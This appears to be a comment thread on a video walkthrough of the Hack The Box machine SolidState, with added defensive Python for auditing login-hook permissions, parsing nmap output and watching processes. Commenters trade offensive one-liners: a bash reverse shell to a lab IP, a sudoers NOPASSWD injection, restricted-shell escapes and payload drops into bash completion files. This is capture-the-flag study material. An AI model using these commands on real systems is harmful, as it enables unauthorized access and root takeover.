So glad I watch your videos after rooting! I spent far too long getting a reverse shell to work from the .py script - the dash trick was very cool and something I've made a note of for future reference!
@codebx 5 years ago
I'm sure you already found this out since this was almost a year ago, but you should be able to install 'gcc-multilib' on your host (kali) instance, and then you can compile your C code with the '-m32' gcc flag, which will compile your binary as a 32-bit binary. That way you won't need a 32-bit machine lying around. Another quick tip is that sometimes you'll have glibc version incompatibilities, and you can use the gcc flag '-D_GNU_SOURCE', which should use more portable versions of glibc that will likely be compatible with the victim machine you're running the code on.
@lumenknotty6355 1 year ago
Fuck, this saved my life for Haircut in 2023. I could not understand why it wasn't working. Thank you.
@magnoliacomputerscience7334 6 years ago
Probably my favorite box, sad they retired it :/ Love the vid, glad you can pass your knowledge down to the unlearned like me!
@slythx5231 3 years ago
18:21 The reverse shell didn't work because the "/bin/bash -c" is missing. It should be os.system("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.23/1234 0>&1' ")
@onlyastron4ut 3 years ago
This box was a lot of fun and was indeed fairly straightforward; my main problem was getting a stable shell as mindy, as I didn't escape rbash like you did. Nonetheless I rooted this box fairly quickly, so that's a good thing!
@Nilaats 6 years ago
I was working this box while you were recording; the /bulb in the ssh login script was me lol
@desktopt328 4 years ago
Thanks for the great walkthrough as usual! I have one question though. I am not a Linux expert, but is any exploit you add to /etc/bash_completion.d executed once a user logs in? Or is this just specific to the James exploit? I remember reading that you can get a shell using bashrc or bash_auto-completion (not sure) if you can write files to Linux using FTP or any service that would allow you to put files on the system. 26:10
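On the defensive side of this question: on systems with bash-completion installed, interactive bash sessions source every file in /etc/bash_completion.d, so what matters is whether a non-root user can write there. The audit below is an added example, not code from the video or the comments; the directory list and the sample tree it builds for a stand-alone run are assumptions.

```python
import os
import stat
import tempfile

# Directories whose files get sourced by login / interactive bash shells.
# This list is an assumption for illustration; adjust it for your distro.
LOGIN_HOOK_DIRS = ["/etc/profile.d", "/etc/bash_completion.d"]


def writable_by_others(path, require_root_owner=True):
    """True if group/world write bits are set (or, optionally, owner != root)."""
    st = os.lstat(path)
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        return True
    return require_root_owner and st.st_uid != 0


def audit_login_hooks(dirs=LOGIN_HOOK_DIRS, require_root_owner=True):
    """Return sorted paths under `dirs` that a non-root user could modify.

    The directory itself is reported too: a writable directory lets anyone
    drop a brand-new file that the next shell will source.
    """
    findings = []
    for d in dirs:
        if not os.path.isdir(d):
            continue
        if writable_by_others(d, require_root_owner):
            findings.append(d)
        for name in os.listdir(d):
            p = os.path.join(d, name)
            if os.path.islink(p):
                findings.append(p)  # symlink targets can be re-pointed; review them
            elif os.path.isfile(p) and writable_by_others(p, require_root_owner):
                findings.append(p)
    return sorted(findings)


def build_sample_tree():
    """Constructed sample hook directory so the audit can be run offline."""
    root = tempfile.mkdtemp(prefix="hooks_")
    safe = os.path.join(root, "10-safe.sh")
    loose = os.path.join(root, "20-loose.sh")
    for p in (safe, loose):
        with open(p, "w") as fh:
            fh.write("# sample completion file (constructed)\n")
    os.chmod(safe, 0o644)   # root-style permissions: not reported
    os.chmod(loose, 0o666)  # world-writable: anyone can append commands
    return root, safe, loose
```

Run `audit_login_hooks()` with the defaults on a real host to list the sourced files that are loose; the temp tree exists only for the offline demo.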
@nmkkannan1256 4 years ago
How can we know /bin/dash can be checked? Or is it a generic checklist-based approach?
@berndeckenfels 4 years ago
Is the James exploit, which is waiting for a James login, supposed to get a James login by the box? Or can the file be dropped for something like user crontab or similar?
@_Skunkfoot_ 6 years ago
Interesting. When you get the exploit to run, you get a shell, but it's still the mindy user, right? I actually found some python code to connect back to my box and put that in the /opt/tmp.py. Then, in order to get a root shell, I used the james exploit to run /opt/tmp.py whenever someone logged in. This way, I got a reverse shell as root. Not saying this way is better, it's probably a lot of unnecessary work. I like seeing different ways to priv esc, I've never seen that dash method before!
@willframpton5955 5 years ago
Nc didn't return the shell because you specified 15-24 in your IP address - not 14-23 17:10
@CameronNoakes 3 years ago
I noticed this as well - we are on the ball!
@HK-sw3vi 3 years ago
That part made me anxious
@VoidBiscuit 2 years ago
@@HK-sw3vi same lol
@space_venture782 5 years ago
I cannot nmap scan or ping the machine, and some machines work fine and others don't in Hack The Box (all the configuration is super, I followed every step). Why is that happening?
@susnoname 2 years ago
At 20:09 IppSec said that the script runs every 3 minutes. Maybe I missed something, but where did he see that information?
@GeekyGizmo007 4 years ago
Why in the world would 6 people downvote this...
@brandonevans5123 2 years ago
Thanks for the video! I think there might be another privesc method I couldn't find any discussion on, using CVE-2017-18190, since you can set up an ssh tunnel on port 631 to access the administration panel of CUPS 2.2.1. I might play around with it later and see, but if anyone else has tried this I would like to know!
@Lipo55 4 years ago
Hi, Ippsec, I don't understand how the "/opt/tmp.py" was executed without being in a cron job at 21:48. Can you tell me, please? Thanks!
@aharonmo4188 4 years ago
I also didn't understand that! How did you realize that the cron will execute every 3 min?
@TheFunLee 3 years ago
Just completed Solidstate yesterday and just watched this video. But I did try to use bash or /bin/bash for rbash-escaping; it didn't work for me. Seems bash is not in mindy's bin...
@raycharles6240 3 years ago
I faced the same issue as well.
@CurrentlyObsessively 4 years ago
4:26 ...I have done so much tr and sed for no reason... THERE'S A GNMAP OUTPUT?!?!? grep-able nmap format sounds so nice
@raulcpop 5 years ago
I am doing this machine once again. You have gaps between ssh mindy and the rbash escape you used before the James exploit, and that's why you could escape it with the "bash" command.
@mikewollmann 2 years ago
22:00 Shouldn't writing to sudoers be enough? Like: os.system( '/bin/echo "mindy ALL=(ALL) NOPASSWD: ALL" > /etc/sudoers') then sudo su - and you're root *shrug*
@blevenzon 6 years ago
Curious what keyboard are you using?
@ippsec 6 years ago
Ducky Zero
@blevenzon 6 years ago
IppSec thank you, it sounds fantastic lol
@rhausk 5 years ago
lol @ 7:37. Did you win Netwars?
@TimmyTSENGKaliOSCPpentest 3 years ago
Can Evolution be used to see the email?
@MrGentlemanism 2 years ago
Couldn't connect to the mail server using Thunderbird..
@nobodysroom3135 1 year ago
The SUID bit of /bin/dash is not set now for this box, so I can't use it for privilege escalation. I think HTB changed this last month; that's really weird. Why didn't they just keep it?
@8urnside 6 years ago
Thanks for another great video. So this py file is run every 3 mins. Nothing showed in the cron jobs, so aside from being curious as to what the file does due to the permissions, is there any way to identify files that are actioned by the system? Thanks
@FelixPeters14188 4 years ago
I found it by using pspy (github.com/DominicBreuker/pspy) and watching the process list.
@mzynehtb7901 2 years ago
@@FelixPeters14188 thanks a lot. I was struggling to find this information.
@user-gi2sb8xr8f 6 years ago
Wow, I wish I was good at regex. More practice needed, I guess.
@matthewrice7590 5 years ago
So how is it that you are able to serve a file from port 80 without having to configure port forwarding on your router?
@tejaszarekar9145 5 years ago
There is no need for port forwarding on the router... This is happening inside the HTB VPN.
@matthewrice7590 5 years ago
tejas zarekar ah, of course... that makes sense. Thanks for the reply.
@howto...6298 4 years ago
Hey ippsec, can you help me... Every time I scan a machine with nmap it says "host seems down"... I don't know why.
@wutangdaug 4 years ago
First, you will need to log in to the VPN. Second of all, you need to make sure the machine is online. You can see the status of the machine from the dashboard. If you want to work on a retired machine, you will need VIP access, my friend.
@nickm.5328 6 years ago
No James escalation :/ still great vid!
@VoidBiscuit 2 years ago
"the path of least resistance" 😂
@kaungkhantnyinyi9579 4 years ago
bash doesn't work on my mindy shell x(
@MichaelImo 4 years ago
Same... I'm thinking they may have made changes to the box since this video came out.
@crn2815 4 years ago
@@MichaelImo Since the box is retired... Use the james exploit to copy "/bin/bash" over to /home/mindy/bin. Since we know mindy's PATH is "/home/mindy/bin", we can run "bash" without any /'s. Maybe it had already been done and ippsec didn't notice, but I just tried out the box and that's the method I used!
@rolfvreijdenberger1639 3 years ago
`BASH_CMDS[lala]=/bin/bash;lala;` will allow you to escape a restricted shell on older rbash versions
@TheLinuxOS 6 years ago
Amazing video (y) Can you tell which screen recorder you are using?
@ippsec 6 years ago
OBS.
@izaak791 5 years ago
Thanks Ippsec for the always awesome tuts! I modified the command at 5:08-5:510 to make life easier for myself and anyone that may need this, as follows:
grep -oP '\d{1,5}/tcp' NmapOutput.nmap | tr -d ' ' | sed 's/\/tcp/,/g' | sed 's/.$//'
We could probably use it with backticks in a script to have it all in one line:
nmap -p- --open 10.10.10.120 -T4 -oA NmapOutput3 && Portlist=`grep -oP '\d{1,5}/tcp' NmapOutput3.nmap | tr -d ' ' | sed 's/\/tcp/,/g' | sed 's/.$//'` && echo "value is:$Portlist" && nmap --script vuln -p$Portlist 10.10.10.120
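The same port extraction done from the greppable .gnmap file mentioned at 4:26 instead of a regex over the normal .nmap output, as an added example that is not from the video or the comment above. The scan text is a constructed sample (the host address is the one used in the comments; the services and versions are made up), and the field layout it relies on is nmap's -oG format: port/state/protocol/owner/service/rpc/version/.

```python
# Constructed sample of nmap's greppable output (-oG / the .gnmap file from -oA).
SAMPLE_GNMAP = (
    "# Nmap scan initiated (constructed sample, not a real scan)\n"
    "Host: 10.10.10.51 ()\tStatus: Up\n"
    "Host: 10.10.10.51 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.4p1/, "
    "25/open/tcp//smtp///, 80/open/tcp//http//Apache httpd/, "
    "110/open/tcp//pop3///, 443/filtered/tcp//https///, "
    "4555/open/tcp//rsip///\tIgnored State: closed (65529)\n"
    "# Nmap done (constructed sample)\n"
)


def parse_gnmap(text):
    """Map host -> list of (port, proto, state, service) from greppable output.

    Only 'Host:' lines that carry a 'Ports:' field are port records; the
    'Status: Up' line and the '#' comment lines are skipped.
    """
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        # Everything between 'Ports:' and the next tab-separated field.
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        for entry in ports_field.split(","):
            fields = entry.strip().split("/")
            # fields: port, state, proto, owner, service, rpc, version, ''
            if len(fields) < 5 or not fields[0].isdigit():
                continue
            hosts.setdefault(host, []).append(
                (int(fields[0]), fields[2], fields[1], fields[4]))
    return hosts


def open_port_list(text, host, proto="tcp"):
    """Comma-separated open ports for a follow-up 'nmap -p', e.g. '22,25,80'."""
    ports = [p for p, pr, st, _ in parse_gnmap(text).get(host, [])
             if pr == proto and st == "open"]
    return ",".join(str(p) for p in sorted(ports))
```

Filtered and closed ports are kept in `parse_gnmap` but dropped by `open_port_list`, so the second scan only targets what actually answered.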
@marcobrandoni8433 6 years ago
Hello everybody, at min 10:33 Ippsec types bash to escape the rbash. This trick doesn't work for me. Is anybody having the same issue? How did you guys bypass it? Thank you for your time/help
@marcobrandoni8433 6 years ago
After trying harder I found this amazing link that solved the issue. I hope this will help someone else too :) speakerdeck.com/knaps/escape-from-shellcatraz-breaking-out-of-restricted-unix-shells?slide=9
@snydher 5 years ago
@@marcobrandoni8433 Thanks buddy, still learning a lot ;)
@jlinscott5174 5 years ago
That "bash --noprofile" did the trick! Thanks!
@zp300 5 years ago
@@jlinscott5174 It should NOT work; he didn't reset the machine prior to working on it. The way to escape that is just "ssh mindy@10.10.10.51 bash" and you're good.
@theodosistarlas7300 6 years ago
Well, I'm kinda new to hacking and not so good. I have watched 4-5 of your videos and I'm curious how you learned that much, and if it's possible for a 17-year-old like me to become a fantastic inspiration like you in hacking. I want to ask where I should start and what the most useful knowledge is, because I've tried for 1-2 weeks to take my first machine down and I suck; I'm starting to feel shitty. I would like to hear some help on where to start, or any tips to become better and understand the theory behind all this. Just one more question: can I try these machines somewhere else when they become retired? Just to understand it, because I can't own machine or user :( so at least I want to practise.
@desktopt328 4 years ago
20:26 The script didn't catch the cron process, apparently because the delay interval is so long that the cron job starts and finishes before the script can detect it. I set the sleep period to .01 and it caught it! Simple yet very effective script. You used another script that does this automatically but in a more professional way, but I can't recall the script name :( And thannnnks dude :D
@ippsec 4 years ago
Probably PSPY
@desktopt328 4 years ago
@@ippsec Yes it is. Thanks :D
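The polling problem from the thread above, as an added example that is neither the commenter's script nor pspy: a snapshot-diff watcher over /proc with the clock, sleep and snapshot source injectable, plus a constructed timeline showing why a long interval misses a cron child that lives for a fraction of a second. The pids, command lines and lifetimes in the simulation are assumptions; only /opt/tmp.py is taken from the video.

```python
import os
import time


def snapshot_procs():
    """Map pid -> command line for every process visible in /proc (Linux)."""
    procs = {}
    for name in os.listdir("/proc"):
        if not name.isdigit():
            continue
        try:
            with open(f"/proc/{name}/cmdline", "rb") as fh:
                procs[int(name)] = fh.read().replace(b"\0", b" ").decode(errors="replace").strip()
        except OSError:
            continue  # process exited between listdir() and open()
    return procs


def new_processes(before, after):
    """Sorted (pid, cmd) pairs present in `after` but absent from `before`."""
    return sorted((pid, cmd) for pid, cmd in after.items() if pid not in before)


def watch(duration, interval, snapshot=snapshot_procs, clock=time.monotonic, sleep=time.sleep):
    """Poll `snapshot()` every `interval` seconds for `duration` seconds and
    return every process that appeared. A child that is born and exits between
    two polls is never seen, so `interval` must be shorter than its lifetime."""
    seen = {}
    previous = snapshot()
    deadline = clock() + duration
    while clock() < deadline:
        sleep(interval)
        current = snapshot()
        for pid, cmd in new_processes(previous, current):
            seen.setdefault(pid, cmd)
        previous = current
    return seen


def simulate(interval, alive=(0.45, 0.65), duration=3.0):
    """Constructed timeline: pid 4242 runs /opt/tmp.py only while t is in
    `alive`; the other entries stand in for long-running daemons."""
    t = [0.0]
    def snapshot():
        procs = {1: "/sbin/init", 300: "/usr/sbin/cron"}
        if alive[0] <= t[0] < alive[1]:
            procs[4242] = "/usr/bin/python3 /opt/tmp.py"
        return procs
    return watch(duration, interval, snapshot=snapshot,
                 clock=lambda: t[0], sleep=lambda s: t.__setitem__(0, t[0] + s))
```

On a real host, `watch(180, 0.01)` covers one three-minute cron cycle with the short sleep the comment settled on.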
@fairchild9able 5 years ago
Good work Ipp. For anyone following along and not getting it, make sure to log in with " ?????@10.10.10.51 -t bash --noprofile"
@paired7815 5 years ago
Thanks man
@wheeler90 4 years ago
Thanks, needed that little push
@ShabazDraee 4 years ago
Hats off mate, well done!
@bugr33d0_hunter8 5 years ago
Haha, he said Nine vah. I thought it was where Jesus was from, Nineveh, or around there. I wonder if they secretly had internet then. Feels like just the other day. 👨💻
@fyodordostoevsky5901 6 years ago
Small inaccuracy escaping rbash: it's only because the exploit was run by another user; if it was a clean run you would have had to pop a rev shell from a James exploit, or at least run it yourself, in order to bypass it with ctrl-c.
@ippsec 6 years ago
Yeah -- Unfortunately I didn't notice another user was on the box until it was too late. I believe I explain it near the very end of the video after I manually cleared out the bash completion junk.
@fyodordostoevsky5901 6 years ago
IppSec, word, as always great videos. I didn't watch the whole thing, sorry if you already knew, m8. I mostly wanted to clarify that to people saying other methods work, such as noprofile.
@TsukiCTF 5 years ago
Have you tried using these too? -> ssh mindy@10.10.10.51 -t "/bin/sh" or ssh mindy@10.10.10.51 -t "bash --noprofile" # (two - before noprofile; youtube renders them like - on my screen if not looking close)
@GuiltySpark 5 years ago
@@TsukiCTF ssh mindy@10.10.10.51 -t "bash --noprofile" worked for me. I'll have to remember this trick in the future.
@marcuswysocki4967 4 years ago
Is there a list or database for all the additions you put on your nmap (for ex. -sC, -sV)? Thanks!
@adogonz442 4 years ago
Search 'man nmap' on google
@berndeckenfels 4 years ago
I think 2>&1 in your reverse shell will take care of the errors landing in the host session, and should better detach from the user term.
@shakirali3647 6 years ago
Hey, your simple nc reverse shell wasn't working because you entered the wrong IP in the first try.
@_Skunkfoot_ 6 years ago
True, but it wouldn't have given him a root shell anyway since he ran it as mindy
@ippsec 6 years ago
As far as I remember, the /opt/tmp.py gets executed as root via a cron every 3 minutes. If I didn't typo, it should have worked.
@_Skunkfoot_ 6 years ago
You're probably right, that's probably the way we're supposed to do it tbh. Probably something I didn't notice or overlooked. But I'm pretty sure if you try to python tmp.py, it will run as mindy and give you a shell with mindy's permissions iirc.
@mingzhangwang6459 6 years ago
I tried to python tmp.py as mindy and it gave me a restricted shell.
@kab3800 4 years ago
@@ippsec I can confirm that it works. If your vi is being weird like in my case (the backspace wasn't working), luckily it had nano, so I modified the tmp.py with ippsec's earlier payload, waited and w00t! Thanks so much Ippsec!! I also followed the 'dash' and 'james' exploit!! You are too good!!!!!
@tornikebarisovi3989 5 years ago
After root, the python script is much simpler: open user.txt and root.txt with the py script and write them to a txt file.
@cocosloan3748 4 years ago
These comments, OMG... You're all so smart, but I doubt you can do 5% of what he's doing!
@romilthakkar404 1 year ago
I got debian_chroot from (ssh username@IP -t "bash --noprofile"). Not from typing bash in mindy.